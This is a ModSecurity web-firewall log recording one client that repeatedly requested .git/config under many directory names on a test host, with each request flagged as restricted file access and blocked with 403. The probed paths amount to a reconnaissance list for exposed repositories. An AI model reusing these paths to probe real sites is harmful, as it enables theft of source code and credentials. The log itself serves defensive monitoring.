[Sun Apr 20 18:22:34.809040 2025] [:error] [pid 2599012] [client 179.43.188.122:44344] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdQAAAA4"]
[Sun Apr 20 18:22:34.809224 2025] [:error] [pid 2599012] [client 179.43.188.122:44344] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdQAAAA4"]
[Sun Apr 20 18:22:34.809352 2025] [:error] [pid 2599012] [client 179.43.188.122:44344] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdQAAAA4"]
[Sun Apr 20 18:22:34.814574 2025] [:error] [pid 2598997] [client 179.43.188.122:44356] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEgAAAAk"]
[Sun Apr 20 18:22:34.814763 2025] [:error] [pid 2598997] [client 179.43.188.122:44356] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEgAAAAk"]
[Sun Apr 20 18:22:34.814898 2025] [:error] [pid 2598997] [client 179.43.188.122:44356] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEgAAAAk"]
[Sun Apr 20 18:22:34.814962 2025] [:error] [pid 2598998] [client 179.43.188.122:44362] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /laravel/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MgAAAAo"]
[Sun Apr 20 18:22:34.815138 2025] [:error] [pid 2598998] [client 179.43.188.122:44362] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MgAAAAo"]
[Sun Apr 20 18:22:34.815318 2025] [:error] [pid 2598998] [client 179.43.188.122:44362] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MgAAAAo"]
[Sun Apr 20 18:22:34.824625 2025] [:error] [pid 2598990] [client 179.43.188.122:44364] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtgAAAAg"]
[Sun Apr 20 18:22:34.824800 2025] [:error] [pid 2598990] [client 179.43.188.122:44364] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtgAAAAg"]
[Sun Apr 20 18:22:34.824934 2025] [:error] [pid 2598990] [client 179.43.188.122:44364] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js../.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtgAAAAg"]
[Sun Apr 20 18:22:34.826163 2025] [:error] [pid 2599010] [client 179.43.188.122:44368] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /assets/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvQAAAA0"]
[Sun Apr 20 18:22:34.826357 2025] [:error] [pid 2599010] [client 179.43.188.122:44368] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvQAAAA0"]
[Sun Apr 20 18:22:34.826500 2025] [:error] [pid 2599010] [client 179.43.188.122:44368] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/assets/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvQAAAA0"]
[Sun Apr 20 18:22:34.830504 2025] [:error] [pid 2597531] [client 179.43.188.122:44378] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /source/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIAAAAAI"]
[Sun Apr 20 18:22:34.830681 2025] [:error] [pid 2597531] [client 179.43.188.122:44378] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIAAAAAI"]
[Sun Apr 20 18:22:34.830817 2025] [:error] [pid 2597531] [client 179.43.188.122:44378] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSIAAAAAI"]
[Sun Apr 20 18:22:34.835210 2025] [:error] [pid 2599013] [client 179.43.188.122:44380] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /scripts/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/scripts/.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_QAAAA8"]
[Sun Apr 20 18:22:34.835400 2025] [:error] [pid 2599013] [client 179.43.188.122:44380] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/scripts/.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_QAAAA8"]
[Sun Apr 20 18:22:34.835567 2025] [:error] [pid 2599013] [client 179.43.188.122:44380] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/scripts/.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_QAAAA8"]
[Sun Apr 20 18:22:34.840317 2025] [:error] [pid 2597529] [client 179.43.188.122:44388] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjQAAAAA"]
[Sun Apr 20 18:22:34.840481 2025] [:error] [pid 2597529] [client 179.43.188.122:44388] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjQAAAAA"]
[Sun Apr 20 18:22:34.840612 2025] [:error] [pid 2597529] [client 179.43.188.122:44388] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/www/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjQAAAAA"]
[Sun Apr 20 18:22:34.841106 2025] [:error] [pid 2599000] [client 179.43.188.122:44390] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /template/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiQAAAAw"]
[Sun Apr 20 18:22:34.841711 2025] [:error] [pid 2599000] [client 179.43.188.122:44390] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiQAAAAw"]
[Sun Apr 20 18:22:34.841853 2025] [:error] [pid 2599000] [client 179.43.188.122:44390] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiQAAAAw"]
[Sun Apr 20 18:22:34.850197 2025] [:error] [pid 2598999] [client 179.43.188.122:44406] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /dist/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQwAAAAs"]
[Sun Apr 20 18:22:34.850400 2025] [:error] [pid 2598999] [client 179.43.188.122:44406] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQwAAAAs"]
[Sun Apr 20 18:22:34.850567 2025] [:error] [pid 2598999] [client 179.43.188.122:44406] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dist/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQwAAAAs"]
[Sun Apr 20 18:22:34.851842 2025] [:error] [pid 2599012] [client 179.43.188.122:44418] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /sandbox/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sandbox/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdgAAAA4"]
[Sun Apr 20 18:22:34.852003 2025] [:error] [pid 2599012] [client 179.43.188.122:44418] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sandbox/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdgAAAA4"]
[Sun Apr 20 18:22:34.852134 2025] [:error] [pid 2599012] [client 179.43.188.122:44418] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sandbox/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdgAAAA4"]
[Sun Apr 20 18:22:34.856168 2025] [:error] [pid 2598997] [client 179.43.188.122:44422] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEwAAAAk"]
[Sun Apr 20 18:22:34.856334 2025] [:error] [pid 2598997] [client 179.43.188.122:44422] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEwAAAAk"]
[Sun Apr 20 18:22:34.856476 2025] [:error] [pid 2598997] [client 179.43.188.122:44422] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old/.git/config"] [unique_id "aAUfSpxo1fL5GOjHvW-iEwAAAAk"]
[Sun Apr 20 18:22:34.860195 2025] [:error] [pid 2598998] [client 179.43.188.122:44438] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /logs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MwAAAAo"]
[Sun Apr 20 18:22:34.860359 2025] [:error] [pid 2598998] [client 179.43.188.122:44438] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MwAAAAo"]
[Sun Apr 20 18:22:34.860496 2025] [:error] [pid 2598998] [client 179.43.188.122:44438] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/.git/config"] [unique_id "aAUfSvGb6mAUUTmQVMS9MwAAAAo"]
